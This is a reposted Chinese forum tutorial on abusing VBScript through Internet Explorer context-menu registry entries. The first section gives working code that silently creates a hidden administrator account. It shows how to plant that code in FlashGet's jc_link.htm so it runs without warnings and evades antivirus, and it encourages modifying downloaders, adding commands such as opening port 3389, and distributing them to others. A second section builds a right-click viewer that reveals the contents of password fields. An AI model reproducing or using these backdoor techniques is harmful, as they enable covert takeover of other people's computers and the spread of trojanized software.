[转帖]脚本语言的妙用

用网际快车做后门

首先我们来看下面的一段代码：

<script language="vbscript">

set r=createobject("wscript.shell")

r.run "net user 柳若寒 123 /add",0

r.run "net localgroup administrators 柳若寒 /add",0

</script>

这是一段非常简单的vbscript代码，其中"net user 柳若寒 123 /add"和"net localgroup administrators 柳若寒 /add"的作用添加一个用户名为柳若寒、密码为123的账户，并提升为管理员。实际运用中，我们可以把它换成所需要的任意cmd命令，后面的参数0代表隐藏执行命令时的cmd窗口，代码执行有效需要本地管理员权限。把这段代码保存为html文件，运行后会弹出安全警告窗口，如图1所示，这样再傻的人都知道有问题了。那么怎样才能保证它的隐秘性呢？无意中我发现网际快车能帮我们这个忙。


我们来看看ie右键菜单，当点击菜单中的使用快车（flashget）下载的时候，它会调用一个vbscript文件，试着把上面的代码插入这个文件看看会有什么效果。随便找一个下载链接，点击“右键→使用快车（flashget）下载”，结果发现居然不会有任何提示，成功地添加了账户。

那么怎样知道它调用的是哪个文件呢？打开注册表，在hkey_current_user\software\microsoft\

internet explorer\menuext\中就是关于ie右键菜单的信息，找到与网际快车相关的项，会发现它调用的是安装目录中的jc_link.htm文件，如图2所示。把上面的代码插入jc_link.htm中就可以了，这样一来就绝对隐藏了，杀毒软件查不到，别人也不会想到你是在网际快车里面动的手脚。事实上不仅是网际快车，比如迅雷、qq等，只要与注册表添加右键菜单有关的都可以用这种方法。大家可以把软件先进行改造，比如添加开3389命令之类的，再提供给别人下载，嘿嘿，这样威力就不是一般的大了。




打造最简单的星号密码查看器

同样的思路，我们用vbscript和在注册表中添加ie右键菜单来实现星号密码查看器。我们先看看实现此功能的代码。

<script language="vbscript">   

  sub getpassword()   

  set srcevent = external.menuarguments.event   

  set doc=external.menuarguments.document   

  set ele=doc.elementfrompoint(srcevent.clientx, srcevent.clienty)   

  if  ele.type   ="password" then   

  if  ele.value="" then   

  alert("密码为空")   

  else   

  alert("密码为:"+ele.value)   

  end if   

  end if   

  end sub   

  call getpassword()   

</script>  

把上面的代码保存为html文件，这里我保存为“d:\pass.html”。然后在注册表hkey_current_

user\software\microsoft\internet explorer\menuext\下新建一个项，命名为“查看星号密码”，选中该项，把里面的字符串的数据改为保存的html文件的地址“d:\pass.html”，再在该项下增加一个dword值，值为4，表示只在右击表单元素时有效，如图3所示。关闭注册表，重新启动ie窗口就可以看到效果了。只要我们在密码框中点击右键选中该项，就会显示出密码框中的密码了。

[em4][em4][emb6][emb6][emb6][emb5][emb5]